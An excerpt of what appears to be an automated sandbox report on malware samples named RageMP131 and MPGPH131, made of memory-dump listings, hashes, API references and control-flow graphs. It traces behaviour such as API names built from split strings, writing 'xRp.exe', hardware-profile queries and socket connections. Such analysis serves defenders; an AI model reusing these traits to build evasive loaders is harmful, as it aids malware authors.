                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID: ios_base::badbit set$ios_base::failbit set
                                      • API String ID: 2659868963-1240500531
                                      • Opcode ID: 69129472d2e53d23d70879c2e87c796375444c0b9992db45d3852a671921ca22
                                      • Instruction ID: be276cec5dc05ded2f634cad82330c0762826ef62bacea1f31943f58c96ac631
                                      • Opcode Fuzzy Hash: 69129472d2e53d23d70879c2e87c796375444c0b9992db45d3852a671921ca22
                                      • Instruction Fuzzy Hash: 5541E5B2910604ABCB04DF59CC45BEEFBFCEF45310F14826AF91597682E774AA40CBA1
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B240B9
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B240D2
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B24BDD
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B24BF6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: value
                                      • API String ID: 4194217158-494360628
                                      • Opcode ID: 738cdbf1779159359ee94492bbbe71161ea0b888b20e6201f36b531bfd716890
                                      • Instruction ID: f2c99f6967256b9b97284373e9eb589a1602f4c6bdbc425da636aecb584304a6
                                      • Opcode Fuzzy Hash: 738cdbf1779159359ee94492bbbe71161ea0b888b20e6201f36b531bfd716890
                                      • Instruction Fuzzy Hash: B651A270C00258DBDB14DFA8DC89BEEBBF4AF05304F144299E449A7792D7B46A88CF91
                                      APIs
                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00B28D11
                                      Strings
                                      • type must be boolean, but is , xrefs: 00B28E02
                                      • type must be string, but is , xrefs: 00B28D78
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task
                                      • String ID: type must be boolean, but is $type must be string, but is
                                      • API String ID: 118556049-436076039
                                      • Opcode ID: 9f1c1d3b2364b88e39171271f2d57d601c8c976901a81fdeb96f8797bca3df0b
                                      • Instruction ID: 61882282c4163500b2b5feb6d8c40b7bf04a05eb4ccf10286768d0b7e81822ca
                                      • Opcode Fuzzy Hash: 9f1c1d3b2364b88e39171271f2d57d601c8c976901a81fdeb96f8797bca3df0b
                                      • Instruction Fuzzy Hash: 7F3119B5900144AFDB14EBA4E842BDDB7E9EB14700F1006F9F419977D2EF74A948C752

                                      Execution Graph

                                      Execution Coverage:1.8%
                                      Dynamic/Decrypted Code Coverage:2%
                                      Signature Coverage:0%
                                      Total number of Nodes:247
                                      Total number of Limit Nodes:39
                                      execution_graph 22558 5c2540 RtlAllocateHeap RtlAllocateHeap RtlAllocateHeap std::locale::_Locimp::_Locimp 22559 5d4540 GetSystemTimePreciseAsFileTime __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __Xtime_get_ticks 22569 5d9bc0 7 API calls 3 library calls 22461 5110720 GetCurrentHwProfileW 22462 5110743 22461->22462 22464 5110623 GetCurrentHwProfileW 22465 6279d0 22466 627a17 22465->22466 22469 6279e8 std::locale::_Setgloballocale 22465->22469 22470 62acb0 22466->22470 22468 627a2a 22471 62acd5 22470->22471 22472 62adfc 22470->22472 22475 62ad43 22471->22475 22476 62ad36 22471->22476 22478 62acea 22471->22478 22493 5c2040 RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 22472->22493 22474 62ae01 22494 5c1fa0 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy 22474->22494 22480 69bfb1 std::_Facet_Register 2 API calls 22475->22480 22483 62acfa std::locale::_Locimp::_Locimp std::locale::_Setgloballocale 22475->22483 22476->22474 22476->22478 22485 69bfb1 22478->22485 22480->22483 22484 62adba std::locale::_Locimp::_Locimp std::locale::_Setgloballocale 22483->22484 22495 6a14d0 RtlAllocateHeap ___std_exception_copy __Getctype 22483->22495 22484->22468 22488 69bfb6 std::_Facet_Register 22485->22488 22487 69bfd0 22487->22483 22488->22487 22489 5c1fa0 Concurrency::cancel_current_task 22488->22489 22496 6aac4c 22488->22496 22490 69bfdc 22489->22490 22502 69d371 RtlAllocateHeap RtlAllocateHeap __freea ___std_exception_copy 22489->22502 22490->22490 22492 5c1fe3 22492->22483 22493->22474 22494->22483 22501 6b3b4d __dosmaperr std::_Facet_Register 22496->22501 22497 6b3b8b 22503 6a9f5f RtlAllocateHeap __dosmaperr 22497->22503 22499 6b3b76 RtlAllocateHeap 22500 6b3b89 22499->22500 22499->22501 22500->22488 22501->22497 22501->22499 22502->22492 22503->22500 22504 b60000 22506 b60044 GetPEB 22504->22506 22508 b60077 CreateFileA 22506->22508 22509 b6022d 22508->22509 22512 6a5e56 22513 6a5e69 ___std_exception_copy 22512->22513 22518 6a5bad 22513->22518 22515 6a5e7e 22525 6a11fc RtlAllocateHeap ___std_exception_copy 22515->22525 22517 6a5e8b 22519 6a5bb9 std::_Locinfo::_Locinfo_dtor 22518->22519 22520 6a5bbf 22519->22520 22522 6a5c02 22519->22522 22535 6a1443 RtlAllocateHeap ___std_exception_copy __Getctype 22520->22535 22526 6a5d30 22522->22526 22524 6a5bda 22524->22515 22525->22517 22527 6a5d43 22526->22527 22528 6a5d56 22526->22528 22527->22524 22536 6a5c57 22528->22536 22530 6a5e07 22530->22524 22531 6a5d79 22531->22530 22532 6a22f1 4 API calls 22531->22532 22533 6a5da7 22532->22533 22534 6aae9d 2 API calls 22533->22534 22534->22530 22535->22524 22537 6a5cc0 22536->22537 22538 6a5c68 22536->22538 22537->22531 22538->22537 22540 6aae5d SetFilePointerEx RtlAllocateHeap ___std_exception_copy 22538->22540 22540->22537 22560 5d4560 GetPEB RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 22211 51104d5 GetCurrentHwProfileW GetCurrentHwProfileW 22561 63bd30 RtlAllocateHeap 22222 6a9e88 22223 6a9e9b ___std_exception_copy 22222->22223 22228 6a9c6a 22223->22228 22225 6a9eb0 22236 6a11fc RtlAllocateHeap ___std_exception_copy 22225->22236 22227 6a9ebd 22229 6a9c78 22228->22229 22234 6a9ca0 22228->22234 22230 6a9ca7 22229->22230 22231 6a9c85 22229->22231 22229->22234 22237 6a9bc3 22230->22237 22241 6a1443 RtlAllocateHeap ___std_exception_copy __Getctype 22231->22241 22234->22225 22235 6a9cdf 22235->22225 22236->22227 22238 6a9bcf std::_Locinfo::_Locinfo_dtor 22237->22238 22242 6a9c1e 22238->22242 22240 6a9bea 22240->22235 22241->22234 22249 6b5363 22242->22249 22248 6a9c60 22248->22240 22266 6b5325 22249->22266 22251 6a9c36 22256 6a9ce1 22251->22256 22252 6b5374 22252->22251 22273 6b3b4d RtlAllocateHeap RtlAllocateHeap __dosmaperr std::_Facet_Register 22252->22273 22254 6b53cd 22274 6b3ad3 RtlAllocateHeap __dosmaperr 22254->22274 22257 6a9c54 22256->22257 22260 6a9cf3 22256->22260 22265 6b540e SetFilePointerEx WriteFile RtlAllocateHeap RtlAllocateHeap 22257->22265 22258 6a9d01 22296 6a1443 RtlAllocateHeap ___std_exception_copy __Getctype 22258->22296 22260->22257 22260->22258 22261 6a9d37 std::locale::_Locimp::_Locimp 22260->22261 22261->22257 22263 6b2ca2 RtlAllocateHeap 22261->22263 22297 6a22f1 22261->22297 22303 6b20ab 22261->22303 22263->22261 22265->22248 22267 6b5331 22266->22267 22268 6b535b 22267->22268 22275 6b2ca2 22267->22275 22268->22252 22270 6b534c 22282 6bda74 22270->22282 22272 6b5352 22272->22252 22273->22254 22274->22251 22276 6b2cae 22275->22276 22277 6b2cc3 22275->22277 22291 6a9f5f RtlAllocateHeap __dosmaperr 22276->22291 22277->22270 22279 6b2cb3 22292 6a14c0 RtlAllocateHeap ___std_exception_copy 22279->22292 22281 6b2cbe 22281->22270 22283 6bda8e 22282->22283 22284 6bda81 22282->22284 22286 6bda9a 22283->22286 22294 6a9f5f RtlAllocateHeap __dosmaperr 22283->22294 22293 6a9f5f RtlAllocateHeap __dosmaperr 22284->22293 22286->22272 22288 6bdabb 22295 6a14c0 RtlAllocateHeap ___std_exception_copy 22288->22295 22289 6bda86 22289->22272 22291->22279 22292->22281 22293->22289 22294->22288 22295->22289 22296->22257 22298 6a230a 22297->22298 22299 6a2331 22297->22299 22298->22299 22300 6b2ca2 RtlAllocateHeap 22298->22300 22299->22261 22301 6a2326 22300->22301 22302 6b20ab 4 API calls 22301->22302 22302->22299 22305 6b20b7 std::_Locinfo::_Locinfo_dtor 22303->22305 22304 6b20f8 22324 6a1443 RtlAllocateHeap ___std_exception_copy __Getctype 22304->22324 22305->22304 22307 6b213e 22305->22307 22309 6b20bf 22305->22309 22307->22309 22310 6b21bc 22307->22310 22309->22261 22311 6b21e4 22310->22311 22323 6b2207 22310->22323 22312 6b21e8 22311->22312 22314 6b2243 22311->22314 22330 6a1443 RtlAllocateHeap ___std_exception_copy __Getctype 22312->22330 22315 6b2261 22314->22315 22331 6aae9d 22314->22331 22325 6b1d01 22315->22325 22319 6b2279 22319->22323 22334 6b18d2 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_dtor _ValidateLocalCookies std::locale::_Locimp::_Locimp 22319->22334 22320 6b22c0 22321 6b2329 WriteFile 22320->22321 22320->22323 22321->22323 22323->22309 22324->22309 22326 6bda74 RtlAllocateHeap 22325->22326 22328 6b1d13 22326->22328 22327 6b1d41 22327->22319 22327->22320 22328->22327 22335 6a6a30 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_dtor ___std_exception_copy 22328->22335 22330->22323 22336 6aad7c 22331->22336 22333 6aaeb6 22333->22315 22334->22323 22335->22327 22341 6b7400 22336->22341 22338 6aad8e 22339 6aadaa SetFilePointerEx 22338->22339 22340 6aad96 22338->22340 22339->22340 22340->22333 22342 6b740d 22341->22342 22343 6b7422 22341->22343 22354 6a9f4c RtlAllocateHeap __dosmaperr 22342->22354 22348 6b7447 22343->22348 22356 6a9f4c RtlAllocateHeap __dosmaperr 22343->22356 22345 6b7412 22355 6a9f5f RtlAllocateHeap __dosmaperr 22345->22355 22348->22338 22349 6b7452 22357 6a9f5f RtlAllocateHeap __dosmaperr 22349->22357 22351 6b741a 22351->22338 22352 6b745a 22358 6a14c0 RtlAllocateHeap ___std_exception_copy 22352->22358 22354->22345 22355->22351 22356->22349 22357->22352 22358->22351 22359 6a5908 22360 6a591b ___std_exception_copy 22359->22360 22365 6a57e3 22360->22365 22362 6a5927 22372 6a11fc RtlAllocateHeap ___std_exception_copy 22362->22372 22364 6a5933 22366 6a57ef std::_Locinfo::_Locinfo_dtor 22365->22366 22367 6a57f9 22366->22367 22369 6a581c 22366->22369 22387 6a1443 RtlAllocateHeap ___std_exception_copy __Getctype 22367->22387 22371 6a5814 22369->22371 22373 6a587a 22369->22373 22371->22362 22372->22364 22374 6a58aa 22373->22374 22375 6a5887 22373->22375 22377 6a58a2 22374->22377 22378 6a22f1 4 API calls 22374->22378 22399 6a1443 RtlAllocateHeap ___std_exception_copy __Getctype 22375->22399 22377->22371 22379 6a58c2 22378->22379 22388 6b3b0d 22379->22388 22382 6b2ca2 RtlAllocateHeap 22383 6a58d6 22382->22383 22392 6b175f 22383->22392 22387->22371 22389 6a58ca 22388->22389 22390 6b3b24 22388->22390 22389->22382 22390->22389 22401 6b3ad3 RtlAllocateHeap __dosmaperr 22390->22401 22393 6b1788 22392->22393 22396 6a58dd 22392->22396 22394 6b17d7 22393->22394 22397 6b17af 22393->22397 22406 6a1443 RtlAllocateHeap ___std_exception_copy __Getctype 22394->22406 22396->22377 22400 6b3ad3 RtlAllocateHeap __dosmaperr 22396->22400 22402 6b16ce 22397->22402 22399->22377 22400->22377 22401->22389 22403 6b16da std::_Locinfo::_Locinfo_dtor 22402->22403 22405 6b1719 22403->22405 22407 6b1832 22403->22407 22405->22396 22406->22396 22408 6b7400 RtlAllocateHeap 22407->22408 22411 6b1842 22408->22411 22409 6b1848 22419 6b736f RtlAllocateHeap __dosmaperr 22409->22419 22411->22409 22412 6b187a 22411->22412 22414 6b7400 RtlAllocateHeap 22411->22414 22412->22409 22413 6b7400 RtlAllocateHeap 22412->22413 22415 6b1886 FindCloseChangeNotification 22413->22415 22416 6b1871 22414->22416 22415->22409 22417 6b7400 RtlAllocateHeap 22416->22417 22417->22412 22418 6b18a0 22418->22405 22419->22418 22422 6a2080 22425 6a1fbe 22422->22425 22424 6a2092 22428 6a1fca std::_Locinfo::_Locinfo_dtor 22425->22428 22426 6a1fd1 22443 6a9f5f RtlAllocateHeap __dosmaperr 22426->22443 22428->22426 22430 6a1ff1 22428->22430 22429 6a1fd6 22444 6a14c0 RtlAllocateHeap ___std_exception_copy 22429->22444 22432 6a2003 22430->22432 22433 6a1ff6 22430->22433 22439 6b33a8 22432->22439 22445 6a9f5f RtlAllocateHeap __dosmaperr 22433->22445 22436 6a200c 22438 6a1fe1 22436->22438 22446 6a9f5f RtlAllocateHeap __dosmaperr 22436->22446 22438->22424 22440 6b33b4 std::_Lockit::_Lockit std::_Locinfo::_Locinfo_dtor 22439->22440 22447 6b344c 22440->22447 22442 6b33cf 22442->22436 22443->22429 22444->22438 22445->22438 22446->22438 22448 6b346f 22447->22448 22452 6b34b5 22448->22452 22453 6b3113 22448->22453 22450 6b34d0 22457 6b3ad3 RtlAllocateHeap __dosmaperr 22450->22457 22452->22442 22456 6b3120 __dosmaperr std::_Facet_Register 22453->22456 22454 6b314b RtlAllocateHeap 22455 6b315e __dosmaperr 22454->22455 22454->22456 22455->22450 22456->22454 22456->22455 22457->22452 22511 511046b GetCurrentHwProfileW GetCurrentHwProfileW GetCurrentHwProfileW 22564 5ca120 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 22541 5dd620 WSAStartup 22542 5dd658 22541->22542 22546 5dd716 22541->22546 22543 5dd6e4 socket 22542->22543 22542->22546 22544 5dd6fa connect 22543->22544 22543->22546 22545 5dd70c closesocket 22544->22545 22544->22546 22545->22543 22545->22546 22565 5ddb20 6 API calls

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 b60044-b60074 GetPEB 1 b60077-b6009a 0->1 2 b6009d-b600a0 1->2 3 b600a6-b600bc 2->3 4 b601ee-b6022b CreateFileA 2->4 5 b60110-b60116 3->5 6 b600be-b600c5 3->6 24 b60265-b60269 4->24 25 b6022d-b60230 4->25 8 b60118-b6011f 5->8 9 b60129-b6012f 5->9 6->5 10 b600c7-b600ce 6->10 8->9 12 b60121-b60124 8->12 13 b60131-b60138 9->13 14 b60148-b6014e 9->14 10->5 11 b600d0-b600d7 10->11 11->5 15 b600d9-b600dd 11->15 17 b601bb-b601c0 12->17 13->14 18 b6013a-b60141 13->18 19 b60167-b6016f 14->19 20 b60150-b60157 14->20 15->5 21 b600df-b600e3 15->21 27 b601c2-b601c5 17->27 28 b601e0-b601e9 17->28 18->14 26 b60143-b60146 18->26 22 b60171-b60178 19->22 23 b60188-b6018e 19->23 20->19 29 b60159-b60160 20->29 21->17 31 b600e9-b6010b 21->31 22->23 32 b6017a-b60181 22->32 33 b601a7-b601ad 23->33 34 b60190-b60197 23->34 35 b60232-b60238 25->35 26->17 27->28 36 b601c7-b601ca 27->36 28->2 29->19 30 b60162-b60165 29->30 30->17 31->1 32->23 37 b60183-b60186 32->37 33->17 39 b601af-b601b6 33->39 34->33 38 b60199-b601a0 34->38 40 b60246-b60251 35->40 41 b6023a-b60242 35->41 36->28 42 b601cc-b601cf 36->42 37->17 38->33 45 b601a2-b601a5 38->45 39->17 46 b601b8 39->46 49 b60255-b60261 40->49 41->35 47 b60244 41->47 42->28 43 b601d1-b601d4 42->43 43->28 48 b601d6-b601d9 43->48 45->17 46->17 47->49 48->28 50 b601db-b601de 48->50 49->24 50->4 50->28
                                      APIs
                                      • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00B60223
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul$xRp.exe
                                      • API String ID: 823142352-2378254480
                                      • Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                      • Instruction ID: c175cf7e62359e322fd0410336ddb39b1901080d65975b1861dbf803efc8450c
                                      • Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                      • Instruction Fuzzy Hash: 0D611874D21219DBCF24DF95C884AAEB7B0FF55715F2482AAE405BB201C3789E81CB91

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 52 5dd620-5dd652 WSAStartup 53 5dd658-5dd682 call 5c7d20 * 2 52->53 54 5dd726-5dd72f 52->54 59 5dd68e-5dd6d4 53->59 60 5dd684-5dd688 53->60 62 5dd6d6-5dd6dc 59->62 63 5dd720-5dd725 59->63 60->54 60->59 64 5dd6de 62->64 65 5dd734-5dd73e 62->65 63->54 67 5dd6e4-5dd6f8 socket 64->67 65->63 70 5dd740-5dd748 65->70 67->63 69 5dd6fa-5dd70a connect 67->69 71 5dd70c-5dd714 closesocket 69->71 72 5dd730 69->72 71->67 73 5dd716-5dd71f 71->73 72->65 73->63
                                      APIs
                                      • WSAStartup.WS2_32 ref: 005DD64B
                                      • socket.WS2_32(?,?,?,?,?,?,006F50C8,?,?), ref: 005DD6EE
                                      • connect.WS2_32(00000000,?,?,?,?,?,006F50C8,?,?), ref: 005DD702
                                      • closesocket.WS2_32(00000000), ref: 005DD70D
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Startupclosesocketconnectsocket
                                      • String ID:
                                      • API String ID: 3098855095-0
                                      • Opcode ID: 27fe9f77c816e25a574515f658307dfd7bda60df6dbf0610751aacd63f692a75
                                      • Instruction ID: ff3f5b92fcd329b4dab1d93a8d81479363bc86294ef1b1d723f5a2d9ac4fa3ba
                                      • Opcode Fuzzy Hash: 27fe9f77c816e25a574515f658307dfd7bda60df6dbf0610751aacd63f692a75
                                      • Instruction Fuzzy Hash: E131D5725053555BD7209F688C84B6FBBE5FFC9374F001F5BF9A8A22D0E730990586A2

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: kZXZ
                                      • API String ID: 0-1435790286
                                      • Opcode ID: 9d0b2b36955fe0553042869ed81c60cf82e48ae1e41328733668d6754eb5d1e6
                                      • Instruction ID: d0cbdcdead12994cbdd86a331af5e123abec8add652f8ffec1d1116e3e1f7ba3
                                      • Opcode Fuzzy Hash: 9d0b2b36955fe0553042869ed81c60cf82e48ae1e41328733668d6754eb5d1e6
                                      • Instruction Fuzzy Hash: 803115EBA0C115EF616AE1425B5CAF6266FE6DE77073284B6FC07C6101E3944AC9843C

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 110 511054e-5110718 call 511061c 134 5110723-511072e GetCurrentHwProfileW 110->134 135 5110743-51107dc call 51107de 134->135
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID: kZXZ
                                      • API String ID: 2104809126-1435790286
                                      • Opcode ID: 5b66e8d49f433a1e6a45005cc922a805f7c731adc95b53a21ad73db10b44c260
                                      • Instruction ID: 12da2aeb4bb4d6cd9d807e66e8cbd527f9752fa21b57153287cb0c65a25003c2
                                      • Opcode Fuzzy Hash: 5b66e8d49f433a1e6a45005cc922a805f7c731adc95b53a21ad73db10b44c260
                                      • Instruction Fuzzy Hash: 8A3124EBA0C115EFA16AE0425B6CAF6266FE6DE77073284B6FC47C6101E3944AC5843C

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 144 5110430-5110431 145 51103f1-51103f6 144->145 146 5110433-511043e 144->146 149 5110383-5110385 145->149 150 51103f8-5110429 145->150 148 5110440-5110441 146->148 151 5110442 148->151 149->145 150->148 151->151
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 57a081350e1fcbde9e6912d4a31d64dc80923f29980831a16d4caeb0b12a9348
                                      • Instruction ID: f335438cb9d09efafeada8f70ef66937b07a0e4b5b8980de59a471cefe141920
                                      • Opcode Fuzzy Hash: 57a081350e1fcbde9e6912d4a31d64dc80923f29980831a16d4caeb0b12a9348
                                      • Instruction Fuzzy Hash: 876128E7A0C110AFA266D1452B5C9F62B6FE6DE73073284FAFC47C6502D3944ECA8139

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
